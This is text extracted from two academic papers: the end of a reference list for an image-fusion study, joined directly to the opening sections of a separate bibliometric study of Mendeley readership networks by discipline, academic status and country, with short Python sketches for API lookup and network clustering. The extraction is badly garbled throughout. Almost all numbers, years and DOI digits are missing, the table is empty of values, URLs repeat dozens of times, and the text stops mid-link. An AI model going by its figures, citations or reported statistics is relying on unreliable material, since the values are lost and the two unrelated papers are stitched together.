abandoned object detection. journal of electronic imaging ( ): – doi . / . . bhatnagar g, wu qmj. . human visual system based framework for concealed weapon detection. in: the canadian conference on computer and robot vision (crv). piscataway: ieee, – . biswas b, chakrabarti a, dey kn. . spine medical image fusion using wiener filter in shearlet domain. in: ieee nd international conference on recent trends in information systems (retis ). piscataway: ieee, – . black mj, sapiro g, marimont dh, heeger d. . robust anisotropic diffusion. ieee transactions on image processing ( ): – doi . / . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /j.infrared. . . 
http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. blum rs, liu z. . multi-sensor image fusion and its applications. boca raton: crc press, taylor & francis group. bulanona dm, burks tf, alchanatis v. . image fusion of visible and thermal images for fruit detection. biosystems engineering ( ): – doi . /j.biosystemseng. . . . burt pj. . smart sensing with a pyramid vision machine. proceedings ieee ( ): – doi . / . . burt pj. . a gradient pyramid basis for pattern-selective image fusion. in: sid international symposium . playa del rey: society for information display, – . burt pj, adelson eh. . the laplacian pyramid as a compact image code. ieee transactions on communications ( ): – doi . /tcom. . . burt pj, kolczynski rj. . enhanced image capture through fusion. in: fourth international conference on computer vision. piscataway: ieee computer society press, – . cui g, feng h, xu z, li q, chen y. . detail preserved fusion of visible and infrared images using regional saliency extraction and multi-scale image decomposition. optics communications : – doi . /j.optcom. . . . cvejic n, canagarajah cn, bull dr. . image fusion metric based on mu- tual information and tsallis entropy. electronics letters ( ): – doi . /el: . daneshvar s, ghassemian h. . mri and pet image fusion by combining ihs and retina-inspired models. information fusion ( ): – doi . /j.inffus. . . . farbman z, fattal r, lischinski d, szeliski r. . edge-preserving decompositions for multi-scale tone and detail manipulation. acm transactions on graphics ( - article no. ): – doi . / . . fecteau jh, munoz dp. . salience, relevance, and firing: a priority map for target selection. trends in cognitive sciences ( ): – doi . /j.tics. . . . gan w, wu x, wu w, yang x, ren c, he x, liu k. . infrared and visible image fusion with the use of multi-scale edge-preserving decomposition and guided image filter. infrared physics & technology : – doi . /j.infrared. . . . ghassemian h. . a retina based multi-resolution image-fusion. in: ieee interna- tional geoscience and remote sensing symposium (igrss ). piscataway: ieee, – . haghighat mba, aghagolzadeh a, seyedarabi h. . a non-reference image fusion metric based on mutual information of image features. computers & electrical engineering ( ): – doi . /j.compeleceng. . . . haghighat m, razian ma. . fast-fmi: non-reference image fusion metric. piscataway: ieee, – . he k, sun j, tang x. . guided image filtering. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.biosystemseng. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /tcom. . http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . /el: http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.tics. . . http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. hossny m, nahavandi s, creighton d. . comments on ‘‘information mea- sure for performance of image fusion’’. electronics letters ( ): – doi . /el: . jacobson np, gupta mr. . design goals and solutions for display of hyperspectral images. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . jacobson np, gupta mr, cole jb. . linear fusion of image sets for display. ieee transactions on geoscience and remote sensing ( ): – doi . /tgrs. . . jiang d, zhuang d, huan y, fu j. . 
survey of multispectral image fusion techniques in remote sensing applications. in: zheng y, ed. image fusion and its applications. rijeka, croatia: intech open, – . kong sg, heo j, boughorbel f, zheng y, abidi br, koschan a, yi m, abidi ma. . multiscale fusion of visible and thermal ir images for illumination- invariant face recognition. international journal of computer vision ( ): – doi . /s - - - . kong w, wang b, lei y. . technique for infrared and visible image fusion based on non-subsampled shearlet transform & spiking cortical model. infrared physics & technology : – doi . /j.infrared. . . . kumar bks. . image fusion based on pixel significance using cross bilateral filter. signal, image and video processing ( ): – doi . /s - - - . lemeshewsky gp. . park sj, juday rd, eds. multispectral multisensor image fusion using wavelet transforms. bellingham: the international society for optical engineering, – . lepley jj, averill mt. . detection of buried mines and explosive objects using dual- band thermal imagery. in: harmon rs, holloway jh, broach jt, eds. detection and sensing of mines, explosive objects, and obscured targets xvi, vol. spie- . bellingham: the international society for optical engineering, v - . li s, kang x, hu j. . image fusion with guided filtering. ieee transactions on image processing ( ): – doi . /tip. . . li s, kwok jt, wang y. . using the discrete wavelet frame transform to merge landsat tm and spot panchromatic images. information fusion ( ): – doi . /s - ( ) - . li s, li z, gong j. . multivariate statistical analysis of measures for assessing the quality of image fusion. international journal of image and data fusion ( ): – doi . / . li h, manjunath bs, mitra sk. . multisensor image fusion using the wavelet transform. computer vision, graphics and image processing: graphical models and image processing ( ): – . liu z, blasch ep, xue z, zhao j, laganière r, wu w. . objective assessment of multiresolution image fusion algorithms for context enhancement in night vision: a comparative study. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /el: http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /tgrs. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /peerj-cs. liu x, mei w, du h, bei j. . a novel image fusion algorithm based on nonsubsam- pled shearlet transform and morphological component analysis. signal, image and video processing ( ): – doi . /s - - - . liu z, xue z, blum rs, laganiëre r. . concealed weapon detection and visu- alization in a synthesized image. pattern analysis & applications ( ): – doi . /s - - - . motamed c, lherbier r, hamad d. . a multi-sensor validation approach for human activity monitoring. in: th international conference on information fusion (information fusion ). piscataway: ieee. nelsen rb. . discrete bivariate distributions with given marginals and correla- tion. communications in statistics—simulation and computation ( ): – doi . / . o’brien ma, irvine jm. . information fusion for feature extraction and the develop- ment of geospatial information. in: th international conference on information fusion. isif, – . perona p, malik j. . scale-space and edge detection using anisotropic diffusion. 
ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . petrovic vs, xydeas cs. . sensor noise effects on signal-level image fusion perfor- mance. information fusion ( ): – doi . /s - ( ) - . petschnigg g, agrawala m, hoppe h, szeliski r, cohen m, toyama k. . digital photography with flash and no-flash image pairs. new york: acm press, – . qu gh, zhang dl, yan pf. . information measure for performance of image fusion. electronics letters ( ): – doi . /el: . rockinger o. . image sequence fusion using a shift-invariant wavelet transform. in: ieee international conference on image processing, vol. iii. piscataway: ieee, – . rockinger o. . multiresolution-verfahren zur fusion dynamischer bildfolge. phd thesis, technische universität berlin. rockinger o, fechner t. . pixel-level image fusion: the case of image sequences. in: kadar i, ed. signal processing, sensor fusion, and target recognition vii, vol. spie- . bellingham: the international society for optical engineering, – . scheunders p, de backer s. . fusion and merging of multispectral images us- ing multiscale fundamental forms. journal of the optical society of america a ( ): – doi . /josaa. . . shah p, reddy bcs, merchant s, desai u. . context enhancement to reveal a camouflaged target and to assist target localization by fusion of multispec- tral surveillance videos. signal, image and video processing ( ): – doi . /s - - - . singh r, khare a. . fusion of multimodal medical images using daubechies complex wavelet transform—a multiresolution approach. information fusion : – doi . /j.inffus. . . . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /el: http://dx.doi.org/ . /josaa. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /peerj-cs. singh r, vatsa m, noore a. . integrated multilevel image fusion and match score fusion of visible and infrared face images for robust face recognition. pattern recognition ( ): – doi . /j.patcog. . . . tao c, junping z, ye z. . remote sensing image fusion based on ridgelet transform. in: ieee international geoscience and remote sensing symposium (igarss’ ), vol. . piscataway: ieee, – . tian yp, zhou ky, feng x, yu sl, liang h, liang b. . image fusion for infrared thermography and inspection of pressure vessel. journal of pressure vessel technology ( - article no. ): – doi . / . . toet a. a. a morphological pyramidal image decomposition. pattern recognition letters ( ): – doi . / - ( ) - . toet a. b. image fusion by a ratio of low-pass pyramid. pattern recognition letters ( ): – doi . / - ( ) - . toet a. . color image fusion for concealed weapon detection. in: carapezza em, ed. sensors, and command, control, communications, and intelligence (c i) technologies for homeland defense and law enforcement ii, vol. spie- . bellingham: spie, – . toet a. . computational versus psychophysical image saliency: a comparative evaluation study. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . toet a. . tno image fusion dataset. figshare doi . /m .figshare. . toet a, ijspeert i, waxman am, aguilar m. . fusion of visible and thermal imagery improves situational awareness. displays ( ): – doi . /s - ( ) - . toet a, van ruyven lj, valeton jm. . merging thermal and visual images by a contrast pyramid. optical engineering ( ): – doi . / . . 
tomasi c, manduchi r. . bilateral filtering for gray and color images. in: ieee sixth international conference on computer vision. piscataway: ieee, – . wang z, bovik ac. . a universal image quality index. ieee signal processing letters ( ): – doi . / . . wang z, bovik ac, sheikh hr, simoncelli ep. . image quality assessment: from error visibility to structural similarity. ieee transactions on image processing ( ): – doi . /tip. . . wang l, li b, tian lf. . multi-modal medical image fusion using the inter-scale and intra-scale dependencies between image shift-invariant shearlet coefficients. information fusion : – doi . /j.inffus. . . . wertheim ah. . visual conspicuity: a new simple standard, its reliability, validity and applicability. ergonomics ( ): – doi . / . xue z, blum rs. . concealed weapon detection using color image fusion. in: sixth international conference on information fusion (fusion ). piscataway: ieee, – . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /tip. . http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. xue z, blum rs, li y. . fusion of visual and ir images for concealed weapon detection. in: fifth international conference on information fusion, vol. . piscataway: ieee, – . yajie w, mowu l. . image fusion based concealed weapon detection. in: inter- national conference on computational intelligence and software engineering (cise ). piscataway: ieee, – . yang w, liu j-r. . research and development of medical image fusion. in: ieee international conference on medical imaging physics and engineering (icmipe). piscataway: ieee, – . yang s, wang m, jiao l, wu r, wang z. . image fusion based on a new contourlet packet. information fusion ( ): – doi . /j.inffus. . . . yong j, minghui w. . image fusion using multiscale edge-preserving decompo- sition based on weighted least squares filter. iet image processing ( ): – doi . /iet-ipr. . . zhang b, lu x, pei h, zhao y. . a fusion algorithm for infrared and visible images based on saliency analysis and non-subsampled shearlet transform. infrared physics & technology : – doi . /j.infrared. . . . zhang q, shen x, xu l, jia j. . rolling guidance filter. in: fleet d, pajdla t, schiele b, tuytelaars t, eds. th european conference on computer vision (eccv ), vol. iii. berlin heidelberg: springer international publishing, – . zhao j, feng h, xu z, li q, liu t. . detail enhanced multi-source fusion using visual weight map extraction based on multi scale edge preserving decomposition. optics communications : – doi . /j.optcom. . . . zhu z, huang ts. . multimodal surveillance: sensors, algorithms and systems. norwood: artech house publishers. zitová b, beneš m, blažek j. . image fusion for art analysis. in: computer vision and image analysis of art ii, vol. spie- . bellingham: the international society for optical engineering, – . zou x, bhanu b. . tracking humans using multi-modal fusion. in: nd joint ieee international workshop on object tracking and classification in and beyond the visible spectrum (otcbvs’ ). piscataway: ieee, w - - - . toet ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.inffus. . . http://dx.doi.org/ . /iet-ipr. . 
http://dx.doi.org/ . /j.infrared. . . http://dx.doi.org/ . /j.optcom. . . http://dx.doi.org/ . /peerj-cs. networks of reader and country status: an analysis of mendeley reader statistics submitted may accepted october published november corresponding author robin haunschild, r.haunschild@fkf.mpg.de academic editor ciro cattuto additional information and declarations can be found on page doi . /peerj-cs. copyright haunschild et al. distributed under creative commons cc-by . open access networks of reader and country status: an analysis of mendeley reader statistics robin haunschild , lutz bornmann and loet leydesdorff information retrieval service, max planck institute for solid state research, stuttgart, germany division for science and innovation studies, administrative headquarters of the max planck society, munich, germany amsterdam school of communication research (ascor), university of amsterdam, amsterdam, the netherlands abstract the number of papers published in journals indexed by the web of science core collection is steadily increasing. in recent years, nearly two million new papers were published each year; somewhat more than one million papers when primary research papers are considered only (articles and reviews are the document types where primary research is usually reported or reviewed). however, who reads these papers? more precisely, which groups of researchers from which (self-assigned) scientific disciplines and countries are reading these papers? is it possible to visualize readership patterns for certain countries, scientific disciplines, or academic status groups? one popular method to answer these questions is a network analysis. in this study, we analyze mendeley readership data of a set of , , articles and , reviews with publication year to generate three different networks: ( ) the net- work based on disciplinary affiliations of mendeley readers contains four groups: (i) biology, (ii) social sciences and humanities (including relevant computer sciences), (iii) bio-medical sciences, and (iv) natural sciences and engineering. in all four groups, the category with the addition “miscellaneous” prevails. ( ) the network of co-readers in terms of professional status shows that a common interest in papers is mainly shared among phd students, master’s students, and postdocs. ( ) the coun- try network focusses on global readership patterns: a group of nations is identified as core to the scientific enterprise, including russia and china as well as two thirds of the oecd (organisation for economic co-operation and development) countries. subjects data science, databases, network science and online social networks keywords mendeley, network, bibliometrics, pajek, altmetrics, vosviewer introduction bibliometrics is not only a mature research field, which develops advanced indicators for research evaluation purposes, but also a research field, which studies patterns in science. the best method for studying these patterns is bibliometric networking or science mapping. here, bibliometric data are used to generate networks of citation relations (e.g., between scholarly journals), networks of co-authorships (e.g., between highly-cited researchers in information science), or networks of co-occurrence relations between keywords, words in abstracts and/or words in titles (e.g., co-occurrence relations between words in abstracts of papers published in information science) (van eck & how to cite this article haunschild et al. 
( ), networks of reader and country status: an analysis of mendeley reader statistics. peerj comput. sci. :e ; doi . /peerj-cs. mailto:r.haunschild@fkf.mpg.de https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. waltman, ). powerful computers have led to the analysis of large networks, which may include the whole web of science (wos) database from thomson reuters (milojević, ). today, these networks are not only of interest for specialists in bibliometrics or networking, but also for stakeholders from publishers, research institutions, and funding agencies. according to martin, nightingale & rafols ( ) “network and science-mapping visualizations have considerably enhanced the capacity to convey complex information to users. these tools are now sufficiently mature to be used not only available in academia but also in consultancy and funding organisations” (p. ). overviews of publications dealing with networking and mapping have been published, for example, by börner, sanyal & vespignani ( ), leydesdorff ( ), and mingers & leydesdorff ( ). in recent years, altmetrics has developed to a popular research field in bibliometrics (bornmann, ). altmetrics counts and analyzes views, downloads, clicks, notes, saves, tweets, shares, likes, recommends, tags, posts, trackbacks, discussions, bookmarks, and comments to scholarly papers. altmetrics data reflect different kinds of research impact which has been demonstrated, for example, in the case of mendeley readership data for social sciences and humanities (mohammadi & thelwall, ; mohammadi & thelwall, ; sud & thelwall, in press). mendeley readership data are essentially bookmarking data. for the sake of simplicity, we refer to the mendeley data only as reader counts. because it is not clear, what altmetrics counts really measure, most of the studies in this field have calculated the correlation between altmetric counts and citation counts (bornmann, ). a substantial positive correlation points to a certain, but otherwise undefined, meaning of altmetrics in a scientific context. similar to bibliometric data, altmetric data can not only be used for research evaluation purposes, but also for network analysis and science mapping. kraker et al. ( ) presented a methodology and prototype for creating knowledge domain visualizations based on readership statistics (from mendeley). haunschild & bornmann ( ) generated a readership network which is based on mendeley readers per (sub-)discipline for a large dataset of biomedical papers. in this study, we investigate mendeley readership data for all articles and reviews in wos where a doi (digital object identifier) was available from with the following research questions: ( ) are there differences and similarities between disciplines in bookmarking papers? ( ) how do researchers in different career stages differ in terms of bookmarking papers? which groups of researchers read similar or different papers? ( ) researchers from which countries read papers? are there patterns of similar readership between specific countries? we address these questions by studying the network nature of the mendeley readership data. 
for this purpose, we generate three different networks: ( ) the network of disciplinary affiliations can show similarities of and differences in the readerships of papers. ( ) the status group network shows which status groups (e.g., students, lecturers, or professors) commonly read papers (or not). ( ) the country network focuses on global readership patterns: similar and different readings of papers are visualized at the country level. haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. methods dataset used during december – , , mendeley readership statistics for na = , , articles and nr = , reviews were requested via the application programming interface (api), which was made available in , using http get requests from r (http://www. r-project.org/). an example of the r script is available at http://dx.doi.org/ . /m . figshare. . all papers studied here were published in . the publication year is a compromise of taking a rather recent publication year because mendeley was founded in and allowing enough time after publication for reader counts to aggregate. however, as mendeley reader counts are known to accumulate much faster than citation counts (maflahi & thelwall, in press), we feel justified using the publication year . the dois of the papers in the samples were obtained from the in-house database of the max planck society (mpg) based on the wos and administered by the max planck digital library (mpdl). the doi was used to identify the papers in the mendeley api. the mendeley reader counts of , , articles ( . %) and , reviews ( . %) were retrieved via the mendeley api. these percentages are higher than those reported in other studies (haustein & larivière, b). the papers which were matched via their doi in the mendeley api (n = , , ) are analyzed in the remainder of this study. in total, we recorded , , reader counts for articles and , , reader counts for reviews. it is optional for the users of mendeley to provide their disciplinary affiliations (selecting from predefined sub-disciplines) and location. however, mendeley does not provide the possible values of country names in the api. therefore, we used the iso (international the country names in the mendeley web frontend are standardized. the user provides the city name and mendeley proposes different city–country combinations from which the user can choose. organization for standardization) names (see http://countrycode.org) as possible values. out of the countries we could not find any contributions from countries. however, we are not able to distinguish between a country value which is not possible and a paper with no readers from this country. for example, one is less surprised to find no reader counts for countries like holy see (vatican city) than for singapore. we retrieved , , reader counts ( . %) for articles and , reader counts ( . %) for reviews where the users shared their location information. country-specific readership information was available for , ( . %) articles and , ( . %) reviews. the academic status seems to be a mandatory piece of information, as the total number of mendeley readers found agrees with the status-specific readership information. the self-assigned sub-discipline is not mandatory but most mendeley users provide it in our sample set. only , ( . %) of the mendeley article readers and ( . %) review readers did not share their (sub-) disciplinary affiliation. 
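the following python sketch illustrates the doi-based lookup described above (the study itself used r scripts with http get requests). the endpoint, the view=stats parameter, the accept header and the response field names are assumptions about the mendeley catalog api at the time and may have changed; a valid oauth access token is required.

```python
# assumed sketch of a doi-based mendeley catalog lookup; endpoint and field names are
# assumptions and may differ from the api actually used in the study.
import requests

API_URL = "https://api.mendeley.com/catalog"   # assumed catalog endpoint
ACCESS_TOKEN = "..."                            # obtained via mendeley oauth


def reader_counts_for_doi(doi):
    """return reader statistics for one doi, or None if it is not in the catalog."""
    resp = requests.get(
        API_URL,
        params={"doi": doi, "view": "stats"},
        headers={"Authorization": f"Bearer {ACCESS_TOKEN}",
                 "Accept": "application/vnd.mendeley-document.1+json"},
        timeout=30,
    )
    resp.raise_for_status()
    records = resp.json()
    if not records:
        return None
    doc = records[0]
    return {
        "total": doc.get("reader_count", 0),
        "by_status": doc.get("reader_count_by_academic_status", {}),
        "by_country": doc.get("reader_count_by_country", {}),
        "by_subdiscipline": doc.get("reader_count_by_subdiscipline", {}),
    }
```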
software and statistics the data was organized at three levels of aggregation: (a) groups of individual readers who bookmark the papers, in terms of disciplinary affiliations; (b) groups of readers in terms of their professional status (professor, phd student, postdoc, etc.); haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://www.r-project.org/ http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://dx.doi.org/ . /m .figshare. http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://countrycode.org http://dx.doi.org/ . /peerj-cs. table statistics of the full networks of disciplinary affiliations, countries, and status groups. statistical parameter disciplinary affiliation country status group number of vertices average degree . . . degree centralization . . . density . . . closure . . . average distance . . . standard deviation of average distance . . . diameter compactness . . . modularity . . . 
(c) groups of readers in terms of their countries as provided by mendeley readers in their profile. the mendeley bookmarking can be considered as referencing, and then the analysis of this mendeley data is analogous to bibliographic coupling in bibliometrics (kessler, ). although being analogous to bibliographic coupling, the bookmark coupling provides different kinds of information in comparison to bibliographic coupling: first, bibliographic coupling is based on the references in the paper, while mendeley reader counts are similar to times cited data and thus reflect the citing-side (reader-side) perspective. second, bibliographic coupling captures only authors of papers which are indexed in a citation index. there is no necessary relationship between authoring and reading papers: some people read more literature and author few papers or write more monographs. bookmark couplings also capture users of mendeley who author fewer papers or publish in journals which are not indexed in popular citation indices. however, bookmark coupling has another bias, as not everyone uses mendeley to bookmark papers. both methods (bibliographic and bookmark coupling) are interesting to analyze networks of publications. they complement each other. in each of the three analyses, the largest component is extracted, and further analyzed using the community finding algorithm of blondel et al. ( ). pajek is used for the network analysis. default values were used during construction and analysis of all networks. all reader counts are weighted equally (pajek option “unweighted”), and each network connection is counted as a single co-bookmarking event. the results are visualized using vosviewer. results statistical parameters the three networks (disciplinary affiliations, professional status, and countries) presented below are compared in terms of network statistics in table . the network among the status groups is fully connected; but we will discuss the relative weights of the relations haunschild et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in the following. the other two networks are very different in nature, despite the seeming similarity in some of these parameters. disciplinary affiliations among the disciplinary affiliations, could be distinguished in this data, of which ( . %) form a largest component. the five affiliations which were not connected are: “judaism”, “catholicism”, “transport law”, “entertainment, sports and gaming law”, and “air and space law”. these five affiliations belong to the humanities (theology and law, respectively). we found a total of three reader counts for “judaism” and one reader count each for the other four disconnected disciplinary affiliations. only very few researchers in these disciplines seem to use mendeley. similar results have been reported by jeng, he & jiang ( ) who reported that they “did not see many group users from the humanities and other related fields” (p. ). the affiliations in the main component can be sorted into four groupings by the community-finding algorithm of blondel et al. ( ); the modularity—a measure for the quality of the clustering between zero and one—is q = . (cf. table ). the four groups are, respectively: . affiliations mainly in the social sciences and the humanities (fig. ); . affiliations in the bio-medical sciences (fig. ); . affiliations in the natural sciences and engineering (also included in fig. ); . 
affiliations in biology and the geo-sciences (not shown separately). zahedi & van eck have found similar results: they reported that mendeley users are most active in the biomedical sciences, life sciences, and social sciences. figure shows sub-discipline affiliations of mendeley readers with their connections in the social sciences and humanities. the network shown in this figure also includes some reading in the computer sciences and mathematics; the relation seems to be via cognitive psychology, artificial intelligence, etc. the humanities are positioned more at the periphery of this set. the sub-disciplines "taxation law" and "german language" are not directly connected to this sub-group, but are nevertheless sorted into it by the community-finding algorithm; the number of readers providing bookmarks to these sub-disciplines is low. figure shows sub-discipline affiliations in the bio-medical sciences and sub-discipline affiliations in the natural sciences and engineering. we do not show the links in order to keep the distinction between the two sets of nodes (with different colors) focal to the visualization. a version with the network links visible can be web-started from http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= . it is somewhat surprising to see the sub-disciplines "regional law" and "latin" sorted into the network of mainly bio-medical sciences. as the links in the web-started version show, these bookmarks have many links to several sub-disciplines within the bio-medical network.
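to make the construction of the co-readership networks and the community-finding step concrete, the following sketch builds a category-level network from per-paper reader counts and applies louvain community detection. networkx's louvain implementation (available in recent networkx releases) stands in for the blondel et al. algorithm used with pajek, and the input format is an assumption; the same construction applies to disciplinary affiliations, status groups, or countries by changing the category keys.

```python
# sketch of a co-readership (bookmark-coupling) network: two categories are linked when
# at least one paper is bookmarked by readers from both; input format is assumed.
from itertools import combinations
import networkx as nx


def build_coreader_network(readers_per_paper):
    """readers_per_paper: dict mapping a paper id (e.g., doi) to a dict of
    {category: reader_count}, e.g. {"10.1234/abc": {"germany": 3, "china": 1}}."""
    g = nx.Graph()
    for counts in readers_per_paper.values():
        categories = sorted({c for c, n in counts.items() if n > 0})
        for a, b in combinations(categories, 2):
            # each paper contributes one co-bookmarking event per category pair
            if g.has_edge(a, b):
                g[a][b]["weight"] += 1
            else:
                g.add_edge(a, b, weight=1)
    return g


def largest_component_communities(g, seed=0):
    core = g.subgraph(max(nx.connected_components(g), key=len)).copy()
    communities = nx.community.louvain_communities(core, weight="weight", seed=seed)
    modularity = nx.community.modularity(core, communities, weight="weight")
    return core, communities, modularity
```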
http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig 